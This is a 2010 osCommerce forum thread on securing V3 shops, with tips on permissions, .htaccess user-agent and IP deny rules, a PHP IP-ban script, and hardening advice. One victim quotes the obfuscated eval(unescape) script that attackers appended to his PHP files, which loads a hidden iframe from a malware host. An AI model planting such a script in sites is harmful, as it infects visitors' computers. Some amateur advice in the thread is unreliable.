26 replies to this topic

[IndoExport]

Security

First I like to thank the osCommerce team, you have given all a change to get there own online shop without spending a lot of money.

But now to the point of this post, I find it very sad that V3 seams to be at high risk site, I am no pro, but I do know that if you are building an online shop Security must be at the highest level.
If someone ask about V3 in this forum nothing happen, except answer like “you should know it is a demo, and bla bla bla”  
Ore they are referred to the security threat on V2, and there are many scripts on the V2 security, who do not work on V3, and I think that V2 is also running with security problems.
But anyway stop crossing these 2 different sites. V2 and V3 are not the same sites, that is why osCommerce made two forums.
I know V3 is a demo site, but it is out, and can be downloaded by the enterer world, and people are tempted to try it, and are using it.
If it is not safe, someone must take responsibility, you can’t just built a site give it to the whole world, saying “it is just a demo, try it, test it”, and now one year later, do nothing about the serious problem the users who tested it, are facing.

I will try to tell what I’m doing to secure on my site, and I hope you will do the same in this threat.

1. After install, remove install folder, do not rename it. REMOVE it

2. Use FileZilla and give all your files (not folders) chmod 644, Chmod is the file permission, in filezilla you set this permission by right click on each file and set it permission to 644
All files except
DIR_WS_IMAGES_THUMBScarousel.xml if you are using the Carousel.

4. Rename you admin folder, and give it Chmod permission 744, you will now have to open FileZilla and rename you Admin folder back to admin, and set Chmod permission back to 755, before you can use your admin site, then Admin folder and files are only at risk when you are online, on you admin site.

3. Banning IP addresses from you website is not the way to solve this problem, it is to big job and hackers will just get new IP, by using a dynamic host, or a hacked site as there host.
Anyway I have no Idea what else to do, so I used to ways to ban IP addresses from my site.
The .htaccess file in the root, and the one in the /includes folder look like this at the end.
And I copied the 25.000 IP addresses from www.glodev.com/bannedips.php
The top line ErrorDocument is made so that you are telling your banned visitors way they can’t see you site, and who they may contact to open it again.
Just make a simple aduse.html document, saying “you are banned, contact mail@blablabla if you think this is a mistake”
This document have to be located a folder up from where you htaccess file is, if you have no folder up, I will gladly host it for you, for free.

ErrorDocument 403 http://www.yoursite.com/abuse.html
# List from http://www.glodev.com/bannedips.php
SetEnvIfNoCase User-Agent "^Missigua Locator" bad_bot
#SetEnvIfNoCase User-Agent "^PEAR HTTP_Request class" bad_bot
SetEnvIfNoCase User-Agent "^Java/1.4.1" bad_bot
SetEnvIfNoCase User-Agent "^Java/1.5.0" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^Wells Search II" bad_bot
SetEnvIfNoCase User-Agent "^psycheclone" bad_bot
SetEnvIfNoCase User-Agent "^WEP Search 00" bad_bot
SetEnvIfNoCase User-Agent "ia_archiver" bad_bot
deny from env=bad_bot
# Referral spammers
deny from 195.72.159.103
deny from 202.103.208.241

It would be a lot easier if htacces could point to a global IP ban list, but how to do this is out of my knowledge. (deny from this list www.blablabla.bla/banlist.txt)
I did however find this site http://www.spamhaus.org/lookup.lasso here you can test if the IP is bad according to spamhaus.

4. Another way to ban IP is like this,
You make a banned.php document and put in the root, where your index.php is located. my banned php doc. Look like this

<?php
$banned = array("174.129.212.24", "220.181.7.202", "123.125.66.92", "");
$userip = $_SERVER['REMOTE_ADDR'];
if(in_array($userip, $banned))
{
die("You have no access to this site, 
<br />Of Corse this should link to a html or php file like I did in htacces, but I am a noob and I don’t know how to do it!!");
}
?>
<?php
$ban_range_low=ip2long("220.181.7.1");
$ban_range_up=ip2long("220.181.7.201");
$ip=ip2long($HTTP_SERVER_VARS["REMOTE_ADDR"]);
if ($ip>$ban_range_low && $ip<$ban_range_up)
{
	print " You have no access to this site, 
<br />Of Corse this should link to a html or php file like I did in htacces, but I am a noob and I don’t know how to do it!!!";
	exit();
}
?>

First Section are used to ban single IP addresses, and second section are used to ban a range of IP addresses.

All you need to do next is to enter this line in you main php files, like
index.php
application_top.php
configure.php
and wherever you want to put it.

The line is like this.

  include('banned.php');


This was some of my Ideas on how to make V3 more safe.
I can only hope you will post some of your safety ideas.

A few things I would like to know the answer to is:

How can we use Security Pro http://addons.oscommerce.com/info/5752
In V3.
I tried, and there are many things that do not match V3

How can we use SiteMonitor http://addons.oscommerce.com/info/4441
In V3.
I tried, and there are many things that do not match V3

I see only one way forward, let’s try to help each other, V3 is a nice website, it just some more security.

[burt]

Nice post.  The point of Open Source is to get the community working towards a common goal, it is NOT all down to the core developers.

I read yesterday that filezilla stores ftp details in plain text.  Is that true?

[blackwater]

Most hosts don't support SSH/TLS/SSL FTP so it doesn't matter what ftp client you are using, the default connection is plain text password chat. This in itself does not present a risk unless someone is sniffing your web traffic. To sniff your web traffic they would need a compromised machine where the FTP transfer is taking place up to and including the local network gateway. Also if the web host is compromised this is also a risk.

It's nearly impossible to grab the traffic between these two points unless your are an ISP or something.

As far as Filezilla storing the password in plain text that is not the case in at least  3.3.4.1.


I really want to ask IndoExpert if he was hacked or if there are reports of successfull hacks on oscv3. There is a lot of talk that it is buggy, unstable and insecure, and to be used only in test environments. I'm coming to realize that it is probably the most secure OSC version ever after the reported bugs are fixed.

You can't simply browse to an admin application php file like filemanager and get it to work, you must be logged in for the engine to break down and authenticate the specific URLS that is used in admin. So the crux of the matter is preventing logon.  

All the tips mentioned above and a few more, are basic, and seems to do the job very well.

So again, has anyone using v3 been hacked?

[IndoExport]

Hi blackwater
Yes I my site was hacked, all my files named index.php menu.php and more (all files with chmod 644) was added this line at the bottom of the files

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%
3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%78%66%
65%72%2E%63%6F%6D%2F%3F%32%35%30%30%32%36%32%35%22%20%77%69%64%74%68%3D%
31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</s
cript><!-- uy7gdr5332rkmn -->

My site would now ask visitors to accept a popup, this popup would install malware on there PC.
Google blocked my site for 2 days, until I fixed it.

[IndoExport]

Can somone help to make Security Pro work with V3 http://addons.oscommerce.com/info/5752
In the install information it say find this in /includes/application_top.php

// set the application parameters
$configuration_query = tep_db_query('select configuration_key as cfgKey, configuration_value as cfgValue from ' . TABLE_CONFIGURATION);
while ($configuration = tep_db_fetch_array($configuration_query)) {
define($configuration['cfgKey'], $configuration['cfgValue']);
}

Sorry that is not to be found in V3
after this text inset this

// FWR Media Security Pro
if ( defined('FWR_SECURITY_PRO_ON') && FWR_SECURITY_PRO_ON === 'true' ) {
$fwr_security_excludes = array();
if ( defined('FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON') && FWR_SECURITY_PRO_FILE_EXCLUSIONS_ON === 'true' )
$fwr_security_excludes = explode(',', FWR_SECURITY_PRO_FILE_EXCLUSIONS);
if ( !in_array(basename($_SERVER['PHP_SELF']), $fwr_security_excludes) )
include('includes/functions/security.php');
}
if ( function_exists('tep_clean_get__recursive') ) {
// Recursively clean $HTTP_GET_VARS and $_GET
// There is no legitimate reason for these to contain anything but ..
// A-Z a-z 0-9 -(hyphen).(dot)_(underscore) {} space
$HTTP_GET_VARS = tep_clean_get__recursive($HTTP_GET_VARS);
$_GET = tep_clean_get__recursive($_GET);
$_REQUEST = $_GET + $_POST; // $_REQUEST now holds the cleaned $_GET and std $_POST. $_COOKIE has been removed.
fwr_clean_global($_GET); // Change the $GLOBALS value to the cleaned value
}
// END - FWR Media Security Pro

Then upload the includes/functions/security.php file,
Upload and run SecurityPro_installer.php (what dos this file do, install something in my mysql, since this is a demo version I made many changes in mysql, It therefore may damage something, it would be nice if the installation could be done manualy)
Delete the SecurityPro_installer.php

Can somone help make all this work on V3?
Is it even needed on V3?

Edited by IndoExport, 25 September 2010 - 04:50 PM.

[Gergely]

Thanks for advices!

blackwater, on 25 September 2010 - 01:58 PM, said:

So again, has anyone using v3 been hacked?

Hungarian community built demo shops. Some of my V3 demo stores was attempt but the hack code was wrong. The most V3 users started with V3alfa5 and there is no error logger or dont visit URL stats. I thik there will be very usefull an URL logger or everybody have to observe webserver log files. (Visitor web stats very usefull)

Demo shops the best way to catch hackers. :-)

If we can use error and url loggers we can find the attempts. I use the last PHP5.2 GITHUB pack for demo now so I can see the errors in admin side. Error logger the best thing for security reason. Hack codes generate errors in most cases. I can join URL logger results with the errors on the time value so I can catch hackers and IP address.
If the hack code could be silent we lost everyting. You know RC shops works by this wrong way.

Features:
1. The community can collate the hack codes and prevents attempts
2. The core developers can patch by this way
3. The shop can close automatic by errors to prevent next step to lose the store (We have to know hack errors!)

Edited by Gergely, 25 September 2010 - 05:14 PM.

[blackwater]

Let's step back a little and see if we can determine the source of the attack. Do you have any clue on how entry was made to your site eg ftp, admin logon, from another shared host etc.

Secondly  

Quote

Yes I my site was hacked, all my files named index.php menu.php and more (all files with chmod 644) was added this line at the bottom of the files

menu.php does not exist in oscv3 or I can't find it. What is menu.php used for?

[Mark Evans]

As we work on the 3.x series we will subject it to the same level of security auditing as we have done for 2.3 any issues identified will be fixed to remove the need for installation of contributions such as security Pro etc.

However I am not aware of any issues with the 3.0 alpha 5 codebase or in the current 3.x codebase, this doesn't mean they don't exist so if anyone does know of anything which causes security issues then please let someone in the team know so that we can investigate it.

[IndoExport]

blackwater, on 25 September 2010 - 05:15 PM, said:

Let's step back a little and see if we can determine the source of the attack. Do you have any clue on how entry was made to your site eg ftp, admin logon, from another shared host etc.

Secondly  



menu.php does not exist in oscv3 or I can't find it. What is menu.php used for?

Sorry not menu.php but image.php general.php I dont remember all of them, the hacked site is on my laptop at work, No I have no clue on how entry was made.

[blackwater]

With access to so many files in restricted directories it would appear your admin password was comprmised or someone had access to your keyboard.

You probably need a lock and key.

[IndoExport]

blackwater, on 25 September 2010 - 05:55 PM, said:

With access to so many files in restricted directories it would appear your admin password was comprmised or someone had access to your keyboard.

You probably need a lock and key.

I do not know much about how a hacker works, but words like injection attacks give me some idea that by using some post command, you can inject a text string to mysql or directly to a file on a server, I did note that it was only files with the same name that was hacked on my site, eks. all 6 or 7 index.php and all 3 or 4 default.php files and so on.
And i guess having a computer setup to constantly try to inject a text to common used filenames like index and default is what a hacker maybe are spending his miserable life on.
But what do I know, I just don't want this to happen again, and I think the security.php are preventing the use of the kind of signs %64%6F%63% that was used in the hack on my site.
But if you are telling me that this is not possible, then i guess someone have my password to my ftp, witch I of course have changed by now

[Gergely]

IndoExport, on 25 September 2010 - 07:25 PM, said:

I do not know much about how a hacker works

I think must generate errors. I suggest use backend error logger and maybe we can find the security hole

(I hate baxfer)

Edited by Gergely, 25 September 2010 - 08:39 PM.

[blackwater]

Mark addressed the issue of adding Security Pro and OSCv3a5.

Considering the fact that this website is on a laptop I would imagine the web server is also on the same platform which opens up a whole host of considerations in running a web server. Not to say it is not properly configured, but I suspect the oSC team would rather support sites hosted on commercial web servers.

Hacker methods are surely arcane and only experts can begin to keep abreast of this. In contrast though with what you said earlier you are now suggesting you were attacked using injection. Can you provide more information on this?

Edited by blackwater, 25 September 2010 - 09:44 PM.

[IndoExport]

blackwater, on 25 September 2010 - 09:36 PM, said:

Mark addressed the issue of adding Security Pro and OSCv3a5.

Considering the fact that this website is on a laptop I would imagine the web server is also on the same platform which opens up a whole host of considerations in running a web server. Not to say it is not properly configured, but I suspect the oSC team would rather support sites hosted on commercial web servers.

Hacker methods are surely arcane and only experts can begin to keep abreast of this. In contrast though with what you said earlier you are now suggesting you were attacked using injection. Can you provide more information on this?

My site is hosted at one.com, I just downloaded my hacked site with filezilla, when I was at work, and I forget my Laptop at work.
I do not know how I was attacked, I'm no expert in this, It may have bin
One of my laptops, may have had malware on it, and that way someone stole my password.
They have all bin scaned with adaware, small things was found, but nothing serious I think.

The reason I started this post, was in the small hope that Oscommerce users would post there tips on how to make the V3 site more safe.

[blackwater]

Based on what we have learned so far, the scenario might have been like this. FTP password to site was hacked via malware on laptop. A PHP script was uploaded to site and then executed remotely which then searched for specific files and planted Javascript code and then deleted itself.

The defense against this is obviously a clean machine that is used for FTP transfers and not used for browsing the web.

Change the FTP password regularly.

On the server side:

retrict FTP access to specific IP address(es).
retrict MYSQL remote access to specific IP address(es).

Disable directory listings.

In addition, set permission to  directories 755, files 644 and configure.php read-only by owner.

Password protect the admin directory.

Protect the work, download, and temp directories with htaccess (these except "temp" created by the SP add-on should already be protected). All the other directories are protected by the default installation.

Items like Security Pro where changes to the core are necessary are not recommended at this time.

Security add-ons that run as cron jobs or otherwise external to the cart should be OK.

[IndoExport]

Thanks alot for all your help blackwater

Edited by IndoExport, 27 September 2010 - 04:42 PM.

[IndoExport]

How is the htaccess to Protect the work, download, and temp directories scripts.
Like this  

<Files *>
Order Deny,Allow
Deny from all
</Files>

Temp do you mean templates?

Edited by IndoExport, 27 September 2010 - 04:52 PM.

[blackwater]

Yes that is the code you would use for catalog/temp if it exists (not template). All the other directories should already have an htacces from installation (pub,download,includes, work).

On a side note you mentioned scanning using Adaware, well you will need more powerful tools than that to find the more insidious malware.

Edited by blackwater, 27 September 2010 - 08:58 PM.

[driftwood]

Using htacess won't protect you from these hacks as the hack is not entering your site via ftp. Sure you can block the IP, even the referer but that after the event.

The problem here is XSS attacker finding holes in your site code to exploite, 99.99% of the time that's nothing to do with the developers of OSC.

A good read - http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

If you simply add any contribution to your site it will end up a very rich picking.

[Taipo]

The problem seems to me to be in the migration rather than OSC3. If your 2.x oscommerce site was hacked and there were malicious files uploaded into the image directory for example, then if you migrate to version 3.x and install across the top of 2.x, or use the same image directory, then those php files will still remain.

I think it is best practice to completely start again if you intend to upgrade from 2.2 to 2.3.1 or higher. That is by far the safest method.